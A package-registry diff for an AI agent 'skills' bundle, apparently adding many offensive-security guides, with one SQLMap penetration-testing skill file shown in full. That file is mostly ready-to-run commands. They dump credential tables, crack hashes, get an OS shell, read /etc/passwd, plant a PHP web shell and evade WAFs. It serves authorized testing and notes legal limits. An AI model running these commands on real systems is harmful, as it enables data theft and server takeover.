@namch/agent-assistant 1.0.0 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (168) hide show
  1. package/README.md +114 -522
  2. package/agents/backend-engineer.md +0 -8
  3. package/agents/brainstormer.md +0 -6
  4. package/agents/business-analyst.md +0 -5
  5. package/agents/database-architect.md +0 -6
  6. package/agents/debugger.md +0 -6
  7. package/agents/designer.md +0 -5
  8. package/agents/devops-engineer.md +0 -7
  9. package/agents/docs-manager.md +0 -6
  10. package/agents/frontend-engineer.md +0 -7
  11. package/agents/game-engineer.md +0 -7
  12. package/agents/mobile-engineer.md +0 -7
  13. package/agents/performance-engineer.md +0 -7
  14. package/agents/planner.md +0 -6
  15. package/agents/project-manager.md +0 -6
  16. package/agents/researcher.md +0 -5
  17. package/agents/reviewer.md +0 -6
  18. package/agents/scouter.md +0 -6
  19. package/agents/security-engineer.md +0 -7
  20. package/agents/tech-lead.md +0 -7
  21. package/agents/tester.md +0 -5
  22. package/cli/README.md +19 -10
  23. package/documents/business/business-features.md +1 -1
  24. package/documents/business/business-prd.md +4 -4
  25. package/documents/knowledge-architecture.md +1 -1
  26. package/documents/knowledge-domain.md +1 -1
  27. package/documents/knowledge-overview.md +14 -29
  28. package/documents/knowledge-source-base.md +14 -14
  29. package/package.json +1 -1
  30. package/rules/QUICK-REFERENCE.md +4 -1
  31. package/rules/SKILL-DISCOVERY.md +37 -14
  32. package/skills/active-directory-attacks/SKILL.md +383 -0
  33. package/skills/active-directory-attacks/references/advanced-attacks.md +382 -0
  34. package/skills/agent-evaluation/SKILL.md +64 -0
  35. package/skills/agent-memory-mcp/SKILL.md +82 -0
  36. package/skills/agent-memory-systems/SKILL.md +67 -0
  37. package/skills/agent-tool-builder/SKILL.md +53 -0
  38. package/skills/ai-agents-architect/SKILL.md +90 -0
  39. package/skills/ai-product/SKILL.md +54 -0
  40. package/skills/ai-wrapper-product/SKILL.md +273 -0
  41. package/skills/api-documentation-generator/SKILL.md +484 -0
  42. package/skills/api-fuzzing-bug-bounty/SKILL.md +433 -0
  43. package/skills/api-security-best-practices/SKILL.md +907 -0
  44. package/skills/autonomous-agent-patterns/SKILL.md +761 -0
  45. package/skills/autonomous-agents/SKILL.md +68 -0
  46. package/skills/aws-penetration-testing/SKILL.md +405 -0
  47. package/skills/aws-penetration-testing/references/advanced-aws-pentesting.md +469 -0
  48. package/skills/azure-functions/SKILL.md +42 -0
  49. package/skills/backend-dev-guidelines/SKILL.md +342 -0
  50. package/skills/backend-dev-guidelines/resources/architecture-overview.md +451 -0
  51. package/skills/backend-dev-guidelines/resources/async-and-errors.md +307 -0
  52. package/skills/backend-dev-guidelines/resources/complete-examples.md +638 -0
  53. package/skills/backend-dev-guidelines/resources/configuration.md +275 -0
  54. package/skills/backend-dev-guidelines/resources/database-patterns.md +224 -0
  55. package/skills/backend-dev-guidelines/resources/middleware-guide.md +213 -0
  56. package/skills/backend-dev-guidelines/resources/routing-and-controllers.md +756 -0
  57. package/skills/backend-dev-guidelines/resources/sentry-and-monitoring.md +336 -0
  58. package/skills/backend-dev-guidelines/resources/services-and-repositories.md +789 -0
  59. package/skills/backend-dev-guidelines/resources/testing-guide.md +235 -0
  60. package/skills/backend-dev-guidelines/resources/validation-patterns.md +754 -0
  61. package/skills/broken-authentication/SKILL.md +476 -0
  62. package/skills/bullmq-specialist/SKILL.md +57 -0
  63. package/skills/bun-development/SKILL.md +691 -0
  64. package/skills/burp-suite-testing/SKILL.md +380 -0
  65. package/skills/cloud-penetration-testing/SKILL.md +501 -0
  66. package/skills/cloud-penetration-testing/references/advanced-cloud-scripts.md +318 -0
  67. package/skills/computer-use-agents/SKILL.md +315 -0
  68. package/skills/content-creator/SKILL.md +248 -0
  69. package/skills/content-creator/assets/content_calendar_template.md +99 -0
  70. package/skills/content-creator/references/brand_guidelines.md +199 -0
  71. package/skills/content-creator/references/content_frameworks.md +534 -0
  72. package/skills/content-creator/references/social_media_optimization.md +317 -0
  73. package/skills/content-creator/scripts/brand_voice_analyzer.py +185 -0
  74. package/skills/content-creator/scripts/seo_optimizer.py +419 -0
  75. package/skills/context-window-management/SKILL.md +53 -0
  76. package/skills/conversation-memory/SKILL.md +61 -0
  77. package/skills/copy-editing/SKILL.md +439 -0
  78. package/skills/copywriting/SKILL.md +225 -0
  79. package/skills/crewai/SKILL.md +243 -0
  80. package/skills/discord-bot-architect/SKILL.md +277 -0
  81. package/skills/dispatching-parallel-agents/SKILL.md +180 -0
  82. package/skills/email-sequence/SKILL.md +925 -0
  83. package/skills/email-systems/SKILL.md +54 -0
  84. package/skills/ethical-hacking-methodology/SKILL.md +466 -0
  85. package/skills/executing-plans/SKILL.md +76 -0
  86. package/skills/file-path-traversal/SKILL.md +486 -0
  87. package/skills/finishing-a-development-branch/SKILL.md +200 -0
  88. package/skills/frontend-dev-guidelines/SKILL.md +359 -0
  89. package/skills/frontend-dev-guidelines/resources/common-patterns.md +331 -0
  90. package/skills/frontend-dev-guidelines/resources/complete-examples.md +872 -0
  91. package/skills/frontend-dev-guidelines/resources/component-patterns.md +502 -0
  92. package/skills/frontend-dev-guidelines/resources/data-fetching.md +767 -0
  93. package/skills/frontend-dev-guidelines/resources/file-organization.md +502 -0
  94. package/skills/frontend-dev-guidelines/resources/loading-and-error-states.md +501 -0
  95. package/skills/frontend-dev-guidelines/resources/performance.md +406 -0
  96. package/skills/frontend-dev-guidelines/resources/routing-guide.md +364 -0
  97. package/skills/frontend-dev-guidelines/resources/styling-guide.md +428 -0
  98. package/skills/frontend-dev-guidelines/resources/typescript-standards.md +418 -0
  99. package/skills/gcp-cloud-run/SKILL.md +288 -0
  100. package/skills/git-pushing/SKILL.md +33 -0
  101. package/skills/git-pushing/scripts/smart_commit.sh +19 -0
  102. package/skills/github-workflow-automation/SKILL.md +846 -0
  103. package/skills/html-injection-testing/SKILL.md +498 -0
  104. package/skills/idor-testing/SKILL.md +442 -0
  105. package/skills/inngest/SKILL.md +55 -0
  106. package/skills/javascript-mastery/SKILL.md +645 -0
  107. package/skills/kaizen/SKILL.md +730 -0
  108. package/skills/langfuse/SKILL.md +238 -0
  109. package/skills/langgraph/SKILL.md +287 -0
  110. package/skills/linux-privilege-escalation/SKILL.md +504 -0
  111. package/skills/llm-app-patterns/SKILL.md +760 -0
  112. package/skills/metasploit-framework/SKILL.md +478 -0
  113. package/skills/multi-agent-brainstorming/SKILL.md +256 -0
  114. package/skills/neon-postgres/SKILL.md +56 -0
  115. package/skills/nextjs-supabase-auth/SKILL.md +56 -0
  116. package/skills/nosql-expert/SKILL.md +111 -0
  117. package/skills/pentest-checklist/SKILL.md +334 -0
  118. package/skills/pentest-commands/SKILL.md +438 -0
  119. package/skills/plaid-fintech/SKILL.md +50 -0
  120. package/skills/planning-with-files/SKILL.md +211 -0
  121. package/skills/planning-with-files/examples.md +202 -0
  122. package/skills/planning-with-files/reference.md +218 -0
  123. package/skills/planning-with-files/scripts/check-complete.sh +44 -0
  124. package/skills/planning-with-files/scripts/init-session.sh +120 -0
  125. package/skills/planning-with-files/templates/findings.md +95 -0
  126. package/skills/planning-with-files/templates/progress.md +114 -0
  127. package/skills/planning-with-files/templates/task_plan.md +132 -0
  128. package/skills/privilege-escalation-methods/SKILL.md +333 -0
  129. package/skills/production-code-audit/SKILL.md +540 -0
  130. package/skills/prompt-caching/SKILL.md +61 -0
  131. package/skills/prompt-engineering/SKILL.md +171 -0
  132. package/skills/prompt-library/SKILL.md +322 -0
  133. package/skills/rag-engineer/SKILL.md +90 -0
  134. package/skills/rag-implementation/SKILL.md +63 -0
  135. package/skills/react-ui-patterns/SKILL.md +289 -0
  136. package/skills/red-team-tools/SKILL.md +310 -0
  137. package/skills/scanning-tools/SKILL.md +589 -0
  138. package/skills/shodan-reconnaissance/SKILL.md +503 -0
  139. package/skills/slack-bot-builder/SKILL.md +264 -0
  140. package/skills/smtp-penetration-testing/SKILL.md +500 -0
  141. package/skills/social-content/SKILL.md +807 -0
  142. package/skills/software-architecture/SKILL.md +75 -0
  143. package/skills/sql-injection-testing/SKILL.md +448 -0
  144. package/skills/sqlmap-database-pentesting/SKILL.md +400 -0
  145. package/skills/ssh-penetration-testing/SKILL.md +488 -0
  146. package/skills/stripe-integration/SKILL.md +69 -0
  147. package/skills/subagent-driven-development/SKILL.md +240 -0
  148. package/skills/subagent-driven-development/code-quality-reviewer-prompt.md +20 -0
  149. package/skills/subagent-driven-development/implementer-prompt.md +78 -0
  150. package/skills/subagent-driven-development/spec-reviewer-prompt.md +61 -0
  151. package/skills/tavily-web/SKILL.md +36 -0
  152. package/skills/telegram-bot-builder/SKILL.md +254 -0
  153. package/skills/test-driven-development/SKILL.md +371 -0
  154. package/skills/test-driven-development/testing-anti-patterns.md +299 -0
  155. package/skills/test-fixing/SKILL.md +119 -0
  156. package/skills/top-web-vulnerabilities/SKILL.md +543 -0
  157. package/skills/trigger-dev/SKILL.md +67 -0
  158. package/skills/twilio-communications/SKILL.md +295 -0
  159. package/skills/upstash-qstash/SKILL.md +68 -0
  160. package/skills/verification-before-completion/SKILL.md +139 -0
  161. package/skills/voice-agents/SKILL.md +68 -0
  162. package/skills/voice-ai-development/SKILL.md +302 -0
  163. package/skills/windows-privilege-escalation/SKILL.md +496 -0
  164. package/skills/wireshark-analysis/SKILL.md +497 -0
  165. package/skills/wordpress-penetration-testing/SKILL.md +485 -0
  166. package/skills/workflow-automation/SKILL.md +68 -0
  167. package/skills/xss-html-injection/SKILL.md +499 -0
  168. package/skills/zapier-make-patterns/SKILL.md +67 -0
@@ -0,0 +1,400 @@
1
+ ---
2
+ name: SQLMap Database Penetration Testing
3
+ description: This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
4
+ metadata:
5
+ author: zebbern
6
+ version: "1.1"
7
+ ---
8
+
9
+ # SQLMap Database Penetration Testing
10
+
11
+ ## Purpose
12
+
13
+ Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.
14
+
15
+ ## Inputs / Prerequisites
16
+
17
+ - **Target URL**: Web application URL with injectable parameter (e.g., `?id=1`)
18
+ - **SQLMap Installation**: Pre-installed on Kali Linux or downloaded from GitHub
19
+ - **Verified Injection Point**: URL parameter confirmed or suspected to be SQL injectable
20
+ - **Request File (Optional)**: Burp Suite captured HTTP request for POST-based injection
21
+ - **Authorization**: Written permission for penetration testing activities
22
+
23
+ ## Outputs / Deliverables
24
+
25
+ - **Database Enumeration**: List of all databases on the target server
26
+ - **Table Structure**: Complete table names within target database
27
+ - **Column Mapping**: Column names and data types for each table
28
+ - **Extracted Data**: Dumped records including usernames, passwords, and sensitive data
29
+ - **Hash Values**: Password hashes for offline cracking
30
+ - **Vulnerability Report**: Confirmation of SQL injection type and severity
31
+
32
+ ## Core Workflow
33
+
34
+ ### 1. Identify SQL Injection Vulnerability
35
+
36
+ #### Manual Verification
37
+ ```bash
38
+ # Add single quote to break query
39
+ http://target.com/page.php?id=1'
40
+
41
+ # If error message appears, likely SQL injectable
42
+ # Error example: "You have an error in your SQL syntax"
43
+ ```
44
+
45
+ #### Initial SQLMap Scan
46
+ ```bash
47
+ # Basic vulnerability detection
48
+ sqlmap -u "http://target.com/page.php?id=1" --batch
49
+
50
+ # With verbosity for detailed output
51
+ sqlmap -u "http://target.com/page.php?id=1" --batch -v 3
52
+ ```
53
+
54
+ ### 2. Enumerate Databases
55
+
56
+ #### List All Databases
57
+ ```bash
58
+ sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
59
+ ```
60
+
61
+ **Key Options:**
62
+ - `-u`: Target URL with injectable parameter
63
+ - `--dbs`: Enumerate database names
64
+ - `--batch`: Use default answers (non-interactive mode)
65
+
66
+ ### 3. Enumerate Tables
67
+
68
+ #### List Tables in Specific Database
69
+ ```bash
70
+ sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch
71
+ ```
72
+
73
+ **Key Options:**
74
+ - `-D`: Specify target database name
75
+ - `--tables`: Enumerate table names
76
+
77
+ ### 4. Enumerate Columns
78
+
79
+ #### List Columns in Specific Table
80
+ ```bash
81
+ sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch
82
+ ```
83
+
84
+ **Key Options:**
85
+ - `-T`: Specify target table name
86
+ - `--columns`: Enumerate column names
87
+
88
+ ### 5. Extract Data
89
+
90
+ #### Dump Specific Table Data
91
+ ```bash
92
+ sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch
93
+ ```
94
+
95
+ #### Dump Specific Columns
96
+ ```bash
97
+ sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch
98
+ ```
99
+
100
+ #### Dump Entire Database
101
+ ```bash
102
+ sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch
103
+ ```
104
+
105
+ **Key Options:**
106
+ - `--dump`: Extract all data from specified table
107
+ - `--dump-all`: Extract all data from all tables
108
+ - `-C`: Specify column names to extract
109
+
110
+ ### 6. Advanced Target Options
111
+
112
+ #### Target from HTTP Request File
113
+ ```bash
114
+ # Save Burp Suite request to file, then:
115
+ sqlmap -r /path/to/request.txt --dbs --batch
116
+ ```
117
+
118
+ #### Target from Log File
119
+ ```bash
120
+ # Feed log file with multiple requests
121
+ sqlmap -l /path/to/logfile --dbs --batch
122
+ ```
123
+
124
+ #### Target Multiple URLs (Bulk File)
125
+ ```bash
126
+ # Create file with URLs, one per line:
127
+ # http://target1.com/page.php?id=1
128
+ # http://target2.com/page.php?id=2
129
+ sqlmap -m /path/to/bulkfile.txt --dbs --batch
130
+ ```
131
+
132
+ #### Target via Google Dorks (Use with Caution)
133
+ ```bash
134
+ # Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
135
+ sqlmap -g "inurl:?id= site:yourdomain.com" --batch
136
+ ```
137
+
138
+ ## Quick Reference Commands
139
+
140
+ ### Database Enumeration Progression
141
+
142
+ | Stage | Command |
143
+ |-------|---------|
144
+ | List Databases | `sqlmap -u "URL" --dbs --batch` |
145
+ | List Tables | `sqlmap -u "URL" -D dbname --tables --batch` |
146
+ | List Columns | `sqlmap -u "URL" -D dbname -T tablename --columns --batch` |
147
+ | Dump Data | `sqlmap -u "URL" -D dbname -T tablename --dump --batch` |
148
+ | Dump All | `sqlmap -u "URL" -D dbname --dump-all --batch` |
149
+
150
+ ### Supported Database Management Systems
151
+
152
+ | DBMS | Support Level |
153
+ |------|---------------|
154
+ | MySQL | Full Support |
155
+ | PostgreSQL | Full Support |
156
+ | Microsoft SQL Server | Full Support |
157
+ | Oracle | Full Support |
158
+ | Microsoft Access | Full Support |
159
+ | IBM DB2 | Full Support |
160
+ | SQLite | Full Support |
161
+ | Firebird | Full Support |
162
+ | Sybase | Full Support |
163
+ | SAP MaxDB | Full Support |
164
+ | HSQLDB | Full Support |
165
+ | Informix | Full Support |
166
+
167
+ ### SQL Injection Techniques
168
+
169
+ | Technique | Description | Flag |
170
+ |-----------|-------------|------|
171
+ | Boolean-based blind | Infers data from true/false responses | `--technique=B` |
172
+ | Time-based blind | Uses time delays to infer data | `--technique=T` |
173
+ | Error-based | Extracts data from error messages | `--technique=E` |
174
+ | UNION query-based | Uses UNION to append results | `--technique=U` |
175
+ | Stacked queries | Executes multiple statements | `--technique=S` |
176
+ | Out-of-band | Uses DNS or HTTP for exfiltration | `--technique=Q` |
177
+
178
+ ### Essential Options
179
+
180
+ | Option | Description |
181
+ |--------|-------------|
182
+ | `-u` | Target URL |
183
+ | `-r` | Load HTTP request from file |
184
+ | `-l` | Parse targets from Burp/WebScarab log |
185
+ | `-m` | Bulk file with multiple targets |
186
+ | `-g` | Google dork (use responsibly) |
187
+ | `--dbs` | Enumerate databases |
188
+ | `--tables` | Enumerate tables |
189
+ | `--columns` | Enumerate columns |
190
+ | `--dump` | Dump table data |
191
+ | `--dump-all` | Dump all database data |
192
+ | `-D` | Specify database |
193
+ | `-T` | Specify table |
194
+ | `-C` | Specify columns |
195
+ | `--batch` | Non-interactive mode |
196
+ | `--random-agent` | Use random User-Agent |
197
+ | `--level` | Level of tests (1-5) |
198
+ | `--risk` | Risk of tests (1-3) |
199
+
200
+ ## Constraints and Limitations
201
+
202
+ ### Operational Boundaries
203
+ - Requires valid injectable parameter in target URL
204
+ - Network connectivity to target database server required
205
+ - Large database dumps may take significant time
206
+ - Some WAF/IPS systems may block SQLMap traffic
207
+ - Time-based attacks significantly slower than error-based
208
+
209
+ ### Performance Considerations
210
+ - Use `--threads` to speed up enumeration (default: 1)
211
+ - Limit dumps with `--start` and `--stop` for large tables
212
+ - Use `--technique` to specify faster injection method if known
213
+
214
+ ### Legal Requirements
215
+ - Only test systems with explicit written authorization
216
+ - Google dork attacks against unknown sites are illegal
217
+ - Document all testing activities and findings
218
+ - Respect scope limitations defined in engagement rules
219
+
220
+ ### Detection Risk
221
+ - SQLMap generates significant log entries
222
+ - Use `--random-agent` to vary User-Agent header
223
+ - Consider `--delay` to avoid triggering rate limits
224
+ - Proxy through Tor with `--tor` for anonymity (authorized tests only)
225
+
226
+ ## Examples
227
+
228
+ ### Example 1: Complete Database Enumeration
229
+ ```bash
230
+ # Step 1: Discover databases
231
+ sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
232
+ # Result: acuart database found
233
+
234
+ # Step 2: List tables
235
+ sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
236
+ # Result: users, products, carts, etc.
237
+
238
+ # Step 3: List columns
239
+ sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
240
+ # Result: username, password, email columns
241
+
242
+ # Step 4: Dump user credentials
243
+ sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
244
+ ```
245
+
246
+ ### Example 2: POST Request Injection
247
+ ```bash
248
+ # Save Burp request to file (login.txt):
249
+ # POST /login.php HTTP/1.1
250
+ # Host: target.com
251
+ # Content-Type: application/x-www-form-urlencoded
252
+ #
253
+ # username=admin&password=test
254
+
255
+ # Run SQLMap with request file
256
+ sqlmap -r /root/Desktop/login.txt -p username --dbs --batch
257
+ ```
258
+
259
+ ### Example 3: Bulk Target Scanning
260
+ ```bash
261
+ # Create bulkfile.txt:
262
+ echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
263
+ echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt
264
+
265
+ # Scan all targets
266
+ sqlmap -m bulkfile.txt --dbs --batch
267
+ ```
268
+
269
+ ### Example 4: Aggressive Testing
270
+ ```bash
271
+ # High level and risk for thorough testing
272
+ sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3
273
+
274
+ # Specify all techniques
275
+ sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ
276
+ ```
277
+
278
+ ### Example 5: Extract Specific Credentials
279
+ ```bash
280
+ # Target specific columns
281
+ sqlmap -u "http://target.com/page.php?id=1" \
282
+ -D webapp \
283
+ -T admin_users \
284
+ -C admin_name,admin_pass,admin_email \
285
+ --dump --batch
286
+
287
+ # Automatically crack password hashes
288
+ sqlmap -u "http://target.com/page.php?id=1" \
289
+ -D webapp \
290
+ -T users \
291
+ --dump --batch \
292
+ --passwords
293
+ ```
294
+
295
+ ### Example 6: OS Shell Access (Advanced)
296
+ ```bash
297
+ # Get interactive OS shell (requires DBA privileges)
298
+ sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch
299
+
300
+ # Execute specific OS command
301
+ sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch
302
+
303
+ # File read from server
304
+ sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch
305
+
306
+ # File upload to server
307
+ sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch
308
+ ```
309
+
310
+ ## Troubleshooting
311
+
312
+ ### Issue: "Parameter does not seem injectable"
313
+ **Cause**: SQLMap cannot find injection point
314
+ **Solution**:
315
+ ```bash
316
+ # Increase testing level and risk
317
+ sqlmap -u "URL" --dbs --batch --level=5 --risk=3
318
+
319
+ # Specify parameter explicitly
320
+ sqlmap -u "URL" -p "id" --dbs --batch
321
+
322
+ # Try different injection techniques
323
+ sqlmap -u "URL" --dbs --batch --technique=BT
324
+
325
+ # Add prefix/suffix for filter bypass
326
+ sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"
327
+ ```
328
+
329
+ ### Issue: Target Behind WAF/Firewall
330
+ **Cause**: Web Application Firewall blocking requests
331
+ **Solution**:
332
+ ```bash
333
+ # Use tamper scripts
334
+ sqlmap -u "URL" --dbs --batch --tamper=space2comment
335
+
336
+ # List available tamper scripts
337
+ sqlmap --list-tampers
338
+
339
+ # Common tamper combinations
340
+ sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcase
341
+
342
+ # Add delay between requests
343
+ sqlmap -u "URL" --dbs --batch --delay=2
344
+
345
+ # Use random User-Agent
346
+ sqlmap -u "URL" --dbs --batch --random-agent
347
+ ```
348
+
349
+ ### Issue: Connection Timeout
350
+ **Cause**: Network issues or slow target
351
+ **Solution**:
352
+ ```bash
353
+ # Increase timeout
354
+ sqlmap -u "URL" --dbs --batch --timeout=60
355
+
356
+ # Reduce threads
357
+ sqlmap -u "URL" --dbs --batch --threads=1
358
+
359
+ # Add retries
360
+ sqlmap -u "URL" --dbs --batch --retries=5
361
+ ```
362
+
363
+ ### Issue: Time-Based Attacks Too Slow
364
+ **Cause**: Default time delay too conservative
365
+ **Solution**:
366
+ ```bash
367
+ # Reduce time delay (risky, may cause false negatives)
368
+ sqlmap -u "URL" --dbs --batch --time-sec=3
369
+
370
+ # Use boolean-based instead if possible
371
+ sqlmap -u "URL" --dbs --batch --technique=B
372
+ ```
373
+
374
+ ### Issue: Cannot Dump Large Tables
375
+ **Cause**: Table has too many records
376
+ **Solution**:
377
+ ```bash
378
+ # Limit number of records
379
+ sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100
380
+
381
+ # Dump specific columns only
382
+ sqlmap -u "URL" -D db -T table -C username,password --dump --batch
383
+
384
+ # Exclude specific columns
385
+ sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs
386
+ ```
387
+
388
+ ### Issue: Session Drops During Long Scan
389
+ **Cause**: Session timeout or connection reset
390
+ **Solution**:
391
+ ```bash
392
+ # Save and resume session
393
+ sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session
394
+
395
+ # Resume from saved session
396
+ sqlmap -u "URL" --dbs --batch --resume
397
+
398
+ # Use persistent HTTP connection
399
+ sqlmap -u "URL" --dbs --batch --keep-alive
400
+ ```